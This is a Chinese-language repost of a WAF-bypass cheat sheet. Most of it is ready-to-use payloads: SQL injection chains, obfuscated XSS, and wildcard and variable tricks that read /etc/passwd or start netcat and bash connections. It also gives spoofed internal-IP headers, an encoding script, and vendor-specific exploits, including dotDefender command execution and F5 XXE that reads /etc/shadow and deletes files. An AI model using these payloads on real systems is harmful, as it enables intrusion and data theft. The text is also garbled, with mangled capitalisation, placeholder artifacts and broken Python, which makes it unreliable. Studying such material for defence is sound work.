大佬教程收集整理的这篇文章主要介绍了干货|各种WAF绕过手法学习,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
fuzz字典
1.Seclists/Fuzzing
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
2.Fuzz-DB/Attack
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack
3.other Payloads 可能会被ban ip,小心为妙。
https://github.com/foospidy/payloads
多少waf 使用正则匹配。
Case: SQL 注入
过滤关键词: and, or, union可能正则: preg_match('/(and|or|union)/i', $id)被拦截的语句: union SELEct user, password from usersbypass语句: 1 || (SELEct user from users where user_id = 1) = 'admin'• Step 2:
过滤关键词: and, or, union, where被拦截的语句: 1 || (SELEct user from users where user_id = 1) = 'admin'bypass语句: 1 || (SELEct user from users limit 1) = 'admin'• Step 3:
过滤关键词: and, or, union, where, limit被拦截的语句: 1 || (SELEct user from users limit 1) = 'admin'bypass语句: 1 || (SELEct user from users group by user_id having user_id = 1) = 'admin'• Step 4:
过滤关键词: and, or, union, where, limit, group by被拦截的语句: 1 || (SELEct user from users group by user_id having user_id = 1) = 'admin'bypass语句: 1 || (SELEct substr(GROUP_CONCAt(user_id),1,1) user from users ) = 1• Step 5:
过滤关键词: and, or, union, where, limit, group by, SELEct被拦截的语句: 1 || (SELEct substr(gruop_concat(user_id),1,1) user from users) = 1bypass语句: 1 || 1 = 1 into outfile 'result.txt'bypass语句: 1 || substr(user,1,1) = 'a'• Step 6:
过滤关键词: and, or, union, where, limit, group by, SELEct, '被拦截的语句: 1 || (SELEct substr(gruop_concat(user_id),1,1) user from users) = 1bypass语句: 1 || user_id is not nullbypass语句: 1 || substr(user,1,1) = 0x61bypass语句: 1 || substr(user,1,1) = unhex(61)• Step 7:
过滤关键词: and, or, union, where, limit, group by, SELEct, ', hex被拦截的语句: 1 || substr(user,1,1) = unhex(61)bypass语句: 1 || substr(user,1,1) = lower(conv(11,10,36))• Step 8:
过滤关键词: and, or, union, where, limit, group by, SELEct, ', hex, substr被拦截的语句: 1 || substr(user,1,1) = lower(conv(11,10,36))bypass语句: 1 || LPAD(user,7,1)• Step 9:
过滤关键词: and, or, union, where, limit, group by, SELEct, ', hex, substr, white space被拦截的语句: 1 || LPAD(user,7,1)bypass语句: 1%0b||%0bLPAD(user,7,1)1. 大小写
标准: <script>alert()</script>Bypassed: <ScRipT>alert()</sCRipT>标准: select * from all_tables WHERE owneR = 'DATABASE_NAME'Bypassed: select * from all_tables whERe owneR = 'DATABASE_NAME'2. URL 编码
被阻断语句: <svG/x=">"/oNloaD=confirm()//Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F被阻断语句: uNIoN(SELECT 1,2,3,4,5,6,7,8,9,10,11,12)Bypassed: uNIoN%28SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%293. Unicode 编码
标准: <marquee onstart=prompt()>混淆: <marquee onstart=u0070ru06fu006dpt()>被阻断语句: /?redir=http://google.comBypassed: /?redir=http://google。com (Unicode 替代)被阻断语句: <marquee loop=1 onfinish=alert()>xBypassed: <marquee loop=1 onfinish=alert︵1)>x (Unicode 替代)TIP: 查看这些说明 this and this reports on HackerOne. :)4. HTML 实体编码
标准: "><img src=x onerror=confirm()>Encoded: "><img src=x onerror=confirm()> (General form)Encoded: "><img src=x onerror=confirm()> (Numeric referencE)5. 混合编码
Sometimes, WAF rules often tend to filter out a specific type of encoding.This type of filters can be bypassed by mixed encoding payloads.Tabs and newlines further add to obfuscation.混淆:
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>7. 双重URL编码
这个需要服务端多次解析了url编码标准: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:混淆: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:标准: <script>alert()</script>混淆: %253Cscript%253Ealert()%253C%252Fscript%253E8. 通配符使用
用于linux命令语句注入,通过sHell通配符绕过标准: /bin/cat /etc/passwd混淆: /???/??t /???/??ss??Used chars: / ? t s标准: /bin/nc 127.0.0.1 1337混淆: /???/n? 2130706433 1337Used chars: / ? n [0-9]9. 动态payload 生成
标准: <script>alert()</script>混淆: <script>eval('al'+'er'+'t()')</script>标准: /bin/cat /etc/passwd混淆: /bi'n'''/c''at' /e'tc'/pa''ss'wdBash allows path concatenation for execution.标准: <iframe/onload='this["src"]="javascript:alert()"';>混淆: <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';>9. 垃圾字符
Normal payloads get filtered out easily.Adding some junk chars Helps avoid detection (specific cases only).They often Help in confusing regex based firewalls.标准: <script>alert()</script>混淆: <script>+-+-1-+-+alert(1)</script>标准: <BODY onload=alert()>混淆: <BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert()>NOTE: 上述语句可能会破坏正则的匹配,达到绕过。
标准: <a href=javascript;alert()>ClickMeBypassed: <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe10. 插入换行符
部分waf可能会对换行符没有匹配标准: <iframe src=javascript:confirm(0)">混淆: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">11. 未定义变量
bash 和 perl 执行脚本中加入未定义变量,干扰正则。TIP: 随便写个不存在的变量就好。
$aaaa,$sdayuhjbsad,$dad2ed都可以。
Level 1 Obfuscation: Normal标准: /bin/cat /etc/passwd混淆: /bin/cat$u /etc/passwd$uLevel 2 Obfuscation: Postion Based标准: /bin/cat /etc/passwd混淆: $u/bin$u/cat$u $u/etc$u/passwd$uLevel 3 Obfuscation: Random characters标准: /bin/cat /etc/passwd混淆: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff一个精心制作的payload$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf12. Tab 键和换行符
大多数waf匹配的是空格不是Tab标准: <IMG SRC="javascript:alert();">Bypassed: <IMG SRC=" javascript:alert();">变形: <IMG SRC=" jav ascri pt:alert ();">标准: http://test.com/test?id=1 union SELEct 1,2,3标准: http://test.com/test?id=1%09union%23%0A%0DSELEct%2D%2D%0A%0D1,2,3标准: <iframe src=javascript:alert(1)></iframe>混淆:<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>13. Token Breakers(翻译不了 看起来说的就是sql注入闭合)
Attacks on tokenizers attempt to break the logic of splitTing a request into tokens with the Help of token breakers.Token breakers are symbols that allow affecTing the correspondence between an element of a String and a certain token, and thus bypass search by signature.However, the request must still remain valid while using token-breakers.
Case: Unknown Token for the TokenizerPayload: ?id=‘-@R_123_5607@version() UNION SELECT password FROM users --Case: Unknown Context for the Parser (Notice the uncontexted bracket)Payload 1: ?id=123);DROP TABLE users --Payload 2: ?id=1337) INTO OUTFILE ‘xxx’ --
TIP: 更多payload可以看这里 cheat sheet.
14. 其他格式混淆
许多web应用程序支持不同的编码类型(如下表)混淆成服务器可解析、waf不可解析的编码类型Case: IIS
IIS6, 7.5, 8 and 10 (ASPX v4.X) 允许 IBM037 字符可以发送编码后的参数名和值原始请求:
POST /sample.aspx?id1=something http/1.1HOST: victim.comContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 41id2='union all SELEct * from users--
混淆请求 + URL Encoding:
POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 http/1.1HOST: victim.comContent-Type: application/x-www-form-urlencoded; charset=ibm037Content-Length: 115%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60TIP: 可以使用 这个小脚本 来转化编码
import urllib.parse, sysfrom argparse import ArgumentParserlackofart = ''' OBFUSCATOR'''def paramEncode(params="", charset="", encodeEqualSign=false, encodeAmpersand=false, urlDecodeInput=True, urlEncodeOutput=TruE): result = "" equalSign = "=" ampersand = "&" if '=' and '&' in params: if encodeEqualSign: equalSign = equalSign.encode(charset) if encodeAmpersand: ampersand = ampersand.encode(charset) params_list = params.split("&") for param_pair in params_list: param, value = param_pair.split("=") if urlDecodeInput: param = urllib.parse.unquote(param) value = urllib.parse.unquote(value) param = param.encode(charset) value = value.encode(charset) if urlEncodeOutput: param = urllib.parse.quote_plus(param) value = urllib.parse.quote_plus(value) if result: result += ampersand result += param + equalSign + value else: if urlDecodeInput: params = urllib.parse.unquote(params) result = params.encode(charset) if urlEncodeOutput: result = urllib.parse.quote_plus(result) return resultdef main(): print(lackofart) parser = ArgumentParser('python3 obfu.py') parser._action_groups.pop() # A simple hack to have required arguments and optional arguments separately required = parser.add_argument_group('required Arguments') optional = parser.add_argument_group('Optional Arguments') # required Options required.add_argument('-s', '--str', Help='String to obfuscate', dest='str') required.add_argument('-e', '--enc', Help='Encoding type. eg: ibm037, utf16, etc', dest='enc') # Optional Arguments (main stuff and necessary) optional.add_argument('-ueo', Help='URL Encode Output', dest='ueo', action='store_true') optional.add_argument('-udi', Help='URL Decode Input', dest='udi', action='store_true') args = parser.parse_args() if not len(sys.argv) > 1: parser.print_Help() quit() print('Input: %s' % (args.str)) print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=argS.Udi, urlEncodeOutput=argS.Ueo)))if __name__ == '__main__': main()| 服务器信息 | 可用编码 | 说明 |
|---|---|---|
| Nginx, uWSGI-Django-Python3 | IBM037, IBM500, cp875, IBM1026, IBM273 | 对参数名和参数值进行编码服务器会对参数名和参数值均进行url解码需要对等号和& and进行编码(不进行url编码) |
| Nginx, uWSGI-Django-Python2 | IBM037, IBM500, cp875, IBM1026, UTF-16, utf-32, utf-32BE, IBM424 | 对参数名和参数值进行便慢慢服务器会对参数名和参数值均进行url解码等号和&符号不应该以任何方式编码。 |
| Apache-tomcat8-JVM1.8-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, UTF-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 | 参数名按原始格式(可以像往常一样使用url编码)Body 不论是否经过url编码均可等号和&符号不应该以任何方式编码 |
| Apache-tomcat7-JVM1.6-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, UTF-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 | 参数名按原始格式(可以像往常一样使用url编码)Body 不论是否经过url编码均可等号和&符号不应该以任何方式编码 |
| IIS6, 7.5, 8, 10 -ASPX (v4.X) | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, UTF-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDic-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025 | 参数名按原始格式(可以像往常一样使用url编码)Body 不论是否经过url编码均可等号和&符号不应该以任何方式编码 |
这种攻击方法基于服务器如何解释具有相同名称的参数可能造成bypass的情况:服务器使用最后接收到的参数,WAF只检查第一个参数服务器将来自类似参数的值联合起来,WAF单独检查它们下面是相关服务器对参数解释的比较
| 环境 | 参数解析 | 示例 |
|---|---|---|
| ASP/IIS | 用逗号连接 | par1=val1,val2 |
| JSP, Servlet/Apache tomcat | 第一个参数是结果 | par1=val1 |
| ASP.NET/IIS | 用逗号连接 | par1=val1,val2 |
| php/Zeus | 最后一个参数是结果 | par1=val2 |
| php/Apache | 最后一个参数是结果 | par1=val2 |
| JSP, Servlet/jetty | 第一个参数是结果 | par1=val1 |
| IBM Lotus Domino | 第一个参数是结果 | par1=val1 |
| IBM http Server | 最后一个参数是结果 | par1=val2 |
| 第一个参数是结果 | par1=val1 | |
| Oracle application Server 10G | 第一个参数是结果 | par1=val1 |
| Perl CGI/Apache | 第一个参数是结果 | par1=val1 |
| Python/Zope | 第一个参数是结果 | par1=val1 |
| IceWarp | 返回一个列表 | [‘val1’,’val2’] |
| AXIS 2400 | 最后一个参数是结果 | par1=val2 |
| DBMan | 由两个波浪号连接起来 | par1=val1~~val2 |
| 返回一个列表 | ARRAY(0x8b9058C) |
可以尝试 修改 charset header to 更高的 Unicode (eg. UTF-32)当网站解码的时候,触发payloadExample request:
GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 http/1.1Host: site.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0Accept-Charset:utf-32; q=0.5<Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate当站点加载时,将其编码为我们设置的UTF-32编码,然后由于页面的输出编码为UTF-8,将其呈现为:"<script>alert (1) </ script> 从而触发xss
完整url编码后的 payload:
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80空字节通常用作字符串终止符
Payload 示例:<scri%00pt>alert(1);</scri%00pt><scrix00pt>alert(1);</scri%00pt><s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>标准: <a href="javascript:alert()">混淆: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>变形: <a 0x00 href="javascript:alert(1)">clickme</a>RFC 声明节点名不可以由空白起始但是我们可以使用特殊字符 ` %, //, !, ?`, etc.例子:<// style=x:expression28write(1)29> - Works upto IE7 (sourcE)<!--[if]><script>alert(1)</script --> - Works upto IE9 (ReferencE)<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> - Works in IE7 (ReferencE)<%div%20style=xss:expression(prompt(1))> - Works Upto IE7每个浏览器有不同的分隔分隔符
@masato Kinugawafuzz 后发现如下
IExplorer: 0x09, 0x0B, 0x0C, 0x20, 0x3BChrome: 0x09, 0x20, 0x28, 0x2C, 0x3BSafari: 0x2C, 0x3BFireFox: 0x09, 0x20, 0x28, 0x2C, 0x3BOpera: 0x09, 0x20, 0x2C, 0x3BAndroid: 0x09, 0x20, 0x28, 0x2C, 0x3B示例
<a/onmouseover[x0b]=LOCATIOn='x6Ax61x76x61x73x63x72x69x70x74x3Ax61x6Cx65x72x74x28x30x29x3B'>pwn3d找的waf开发人员没有注意到的语句进行攻击
一些WAF开发人员忽略的常见关键字:
JavaScript functions:
window
parent
this
self
Tag attributes:
onwheel
ontoggle
onfilterchange
onbeforescriptexecute
ondragstart
onauxclick
onpointerover
srcdoc
SQL Operators
LPAD( String, padded_length, [ pad_String ] ) LPAD函数从左边对字符串使用指定的字符进行填充 LPAD('tech', 7); 将返回' tech' LPAD('tech', 2); 将返回'te' LPAD('tech', 8, '0'); 将返回'0000tech' LPAD('tech on the net', 15, 'z'); 将返回'tech on the net' LPAD('tech on the net', 16, 'z'); 将返回'ztech on the netfield
FIELD(str,str1,str2,str3,...)返回的索引(从1开始的位置)的str在str1,str2,STR3,...列表中。如果str没有找到,则返回0。+---------------------------------------------------------+| FIELD('ej', 'Hej', 'ej', 'Heja', 'hej', 'foo') |+---------------------------------------------------------+| 2 |+---------------------------------------------------------+bit_count 二进制数中@R_53_11262@的个数。BIT_COUNT(10);因为10转成二进制是1010,所以该结果就是2
示例payloads:
Case: XSS<script>window['alert'](0)</script><script>parent['alert'](1)</script><script>self['alert'](2)</script>Case: SQLiSELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);1%0b||%0bLPAD(USER,7,1)可以使用许多替代原生JavaScript的方法:JSFuck
Jjencode
XChars.JS
很多时候,服务器可以接收各种SSL/TLS密码和版本的连接。初始化到waf不支持的版本找出waf支持的密码(通常WAF供应商文档对此进行了讨论)。找出服务器支持的密码(SSLScan这种工具可以帮助到你)。找出服务器支持但waf不支持的Tool: abuse-ssl-bypass-waf
找到云waf后的源站
TIP: 一些在线资源 IP History 和 DNS Trails
Tool: bypass-firewalls-by-DNS-history
bash bypass-firewalls-by-DNS-history.sh -d <target> --checkall让waf以为请求来自于内部网络,进而不对其进行过滤。
添加如下请求头
X-OriginaTing-IP: 127.0.0.1X-ForWARDed-For: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1X-Client-IP: 127.0.0.1应对已知WAF的绕过
+<wafname> waf bypass
Searching for specific version exploits:"<wafname> <version>" (bypass|exploit)
For specific type bypass exploits:"<wafname>" +<bypass type> (bypass|exploit)
On Exploit DB:site:exploit-db.com +<wafname> bypass
On 0Day Inject0r DB:site:0day.today +<wafname> <type> (bypass|exploit)
On Twitter:site:twitter.com +<wafname> bypass
On Pastebinsite:pastebin.com +<wafname> bypass
SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by @Sec Consult%C0%80'+union+SELEct+col1,col2,col3+from+table+--+
AWS
SQLi Bypass by @enkaskal
"; SELEct * from TARGET_TABLE --XSS Bypass by @kmkz<script>eval(atob(decodeURIComponent("payload")))//Cross Site ScripTing by @WAFNinja
<body style="height:1000px" onwheel="alert(1)"><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)"><b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>HTML Injection by @Global-Evolution
GET /cgi-mod/index.cgi?&priMary_tab=ADVANCED&secondary_tab=test_BACkup_server&content_only=1&&&BACkup_port=21&&BACkup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&BACkup_type=ftp&&BACkup_life=5&&BACkup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&BACkup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&BACkup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_USHost: favoritewaf.comUser-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)XSS Bypass by @0xInfection
<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhereBarracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xortBarracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit) by @xort
Username Enumeration Protection Bypass by http Verb Tampering by @ed0x21son
POST host.com http/1.1Host: favoritewaf.comUser-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)author=1Protected Admin Scripts Bypass by @ed0x21son
http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utilshttp://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-barREST API Disable Bypass by @ed0x21son
http://host/index.php/wp-json/wp/v2/users/SQLi via http Parameter Pollution (NS10.5) by @BGA Security
<soapenv:Envelope xmlns:soapenv="http://scheR_7_11845@as.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> <soapenv:Header/> <soapenv:Body> <String>’ union SELEct current_user, 2#</String> </soapenv:Body></soapenv:Envelope>generic_api_call.pl XSS by @NNPosterhttp://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookiE)%3c/script%3e%3cscript%3e
CloudFlare
HTML Injection by @spyerror
<div style="BACkground:url(/f#oo/;color:red/*/foo.jpg);">XXSS Bypass by @c0d3g33k
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>XSS Bypasses by @Bohdan Korzhynskyi
<svg onload=prompt%26%230000000040document.domain)><svg onload=prompt%26%23x000000028;document.domain)>xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>1'"><img/src/onerror=.1|alert``>XSS Bypass by @RakeshMane10
<svg/onload=alert()//XSS Bypass by @ArbazKiraak
<a href="j	a	v	asc
ri	pt:u0061u006Cu0065u0072u0074(this['document']['cookie'])">X</a>`XSS Bypass by @Ahmet Ümit
<--`<img/src=` onerror=confirm``> --!>XSS Bypass by @Shiva Krishna
javascript:{alert`0`}XSS Bypass by @Brute Logic
<base href=//knoxss.me?XSS Bypass by @RenwaX23 (Chrome only)
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#xRCE Payload Detection Bypass by @theMiddle
cat$u+/etc$u/passwd$u/bin$u/bash$u <ip> <port>";cat+/etc/passwd+#XSS Bypass by @0xInfection
<input/oninput='new Function`confiru006d`0``'><p/ondragstart=%27confirm(0)%27.@R_674_9363@ce(/.+/,eval)%20draggable=True>dragmeSQLi by @WAFNinja
0 union/**/SELEct 1,version(),@@datadirFirewall disable by (v5.0) by @hyp3rlinx
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+<enabled>false</enabled>Remote Command Execution (v3.8-5) by @John Dos
POST /dotDefender/index.cgi http/1.1Host: 172.16.159.132User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Keep-Alive: 300Connection: keep-aliveAuthorization: Basic YWRtaW46Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 95sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15Persistent XSS (v4.0) by @EnableSecurity
GET /c?a=<script> http/1.1Host: 172.16.159.132User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip,deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<script>alert(1)</script>: aaKeep-Alive: 300R-XSS Bypass by @WAFNinja
<svg/onload=prompt(1);><isindex action="javas&tab;cript:alert(1)" type=image><marquee/onstart=confirm(2)>XSS Bypass by @0xInfection
<p draggable=True ondragstart=prompt()>alert<bleh/ondragstart=	parent	['open']	()%20draggable=True>dragmeGET - XSS Bypass (v4.02) by @DavidK/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.sourcE)%20/%3E<img src="WTF" onError="{var{3:s,2:h,5:a,0:v,4:n,1:E}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2Bh%2Bn)(/0wn3d/.sourcE)" />POST - XSS Bypass (v4.02) by @DavidK
<img src="WTF" onError="{var{3:s,2:h,5:a,0:v,4:n,1:E}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/.sourcE)" />clave XSS (v4.02) by @DavidK/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{pcre_expression unvaidated XSS by @Benjamin Mejri
/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0CSP Bypass by @Binar10
POST Type Query
POST /<path>/login-app.aspx http/1.1Host: <host>User-Agent: <any valid user agent String>Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: <the content length must be at least 2399 bytes>var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>GET Type Query
http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>XSS Bypass by @WAFNinja
<table BACkground="javascript:alert(1)"></table>"/><marquee onfinish=confirm(123)>a</marquee>XSS Bypass by @WAFNinja
<body style="height:1000px" onwheel="[DATA]"><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]"><body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)"><div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">XSS Bypass by @Aatif Khan
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)"><div contextmenu="xss">Right-Click Here<menu id="xss"onshow="prom%25%32%33%25%32%36x70;t(1)“>report_type XSS by @NNPoster
https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+POST Based XXE by @Anonymous
POST /sam/admin/vpe2/public/php/server.php http/1.1Host: bigipCookie: BIGIPAuthCookie=*VALID_COOKIE*Content-Length: 143<?xml version="1.0" encoding='utf-8' ?><!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]><message><dialogueType>&e;</dialogueType></message>Directory Traversal by @Anastasios Monachos
Read Arbitrary File
/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwddelete Arbitrary File
POST /tmui/Control/form http/1.1Host: site.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwdContent-Type: application/x-www-form-urlencoded_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjLisT_Before=&hideObjList=&hideObjLisT_Before=&enabLeobjList=&enabLeobjLisT_Before=&disabLeobjList=&disabLeobjLisT_Before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=delete&delete_before=deleteSQLi Bypass from @Anonymous
state=%2527+and+(case+when+SUBStriNG(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+BENCHMARK(40000000,ENCODE(%2527Hello%2527,%2527batman%2527))+else+0+end)=0+--+RCE Payloads Detection Bypass for PL3 by @theMiddle (v3.1)
;+$u+cat+/etc$u/passwd$uRCE Payloads Detection Bypass for PL2 by @theMiddle (v3.1)
;+$u+cat+/etc$u/passwd+#RCE Payloads for PL1 and PL2 by @theMiddle (v3.0)
/???/??t+/???/??ss??RCE Payloads for PL3 by @theMiddle (v3.0)
/?in/cat+/et?/passw?SQLi Bypass by @Johannes Dahse (v2.2)
0+div+1+union%23foo*%2F*bar%0D%0ASELEct%23foo%0D%0A1%2C2%2Ccurrent_userSQLi Bypass by @Yuri Goltsev (v2.2)
1 AND (SELEct DCount(last(userName)&after=1&after=1) from users where username='ad1min')SQLi Bypass by @Ahmad Maulana (v2.2)
1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-SQLi Bypass by @Travis Lee (v2.2)amUserId=1 union SELEct username,password,3,4 from usersSQLi Bypass by @Roberto Salgado (v2.2)
%0ASELEct%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_scheR_7_11845@a.tables%20limit%201SQLi Bypass by @Georgi Geshev (v2.2)
1%0bAND(SELECT%0b1%20FROM%20mysql.X)SQLi Bypass by @SQLMap Devs (v2.2)
%40%40new%20union%23sqlmapsqlmap...%0ASELEct%201,2,database%23sqlmap%0A%28%29SQLi Bypass by @HackPlayers (v2.2)
%0ASELEct%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_scheR_7_11845@a.tables%20limit%201Imperva SecureSphere 13 - Remote Command Execution by @rsp3ar
XSS Bypass by @David Y
<svg onloadrn=$.globalEval("al"+"ert()");>XSS Bypass by @Emad Shanab
<svg/onload=self[`aler`%2b`t`]`1`>anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldzXSS Bypass by @WAFNinja
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3EXSS Bypass by @i_bo0om
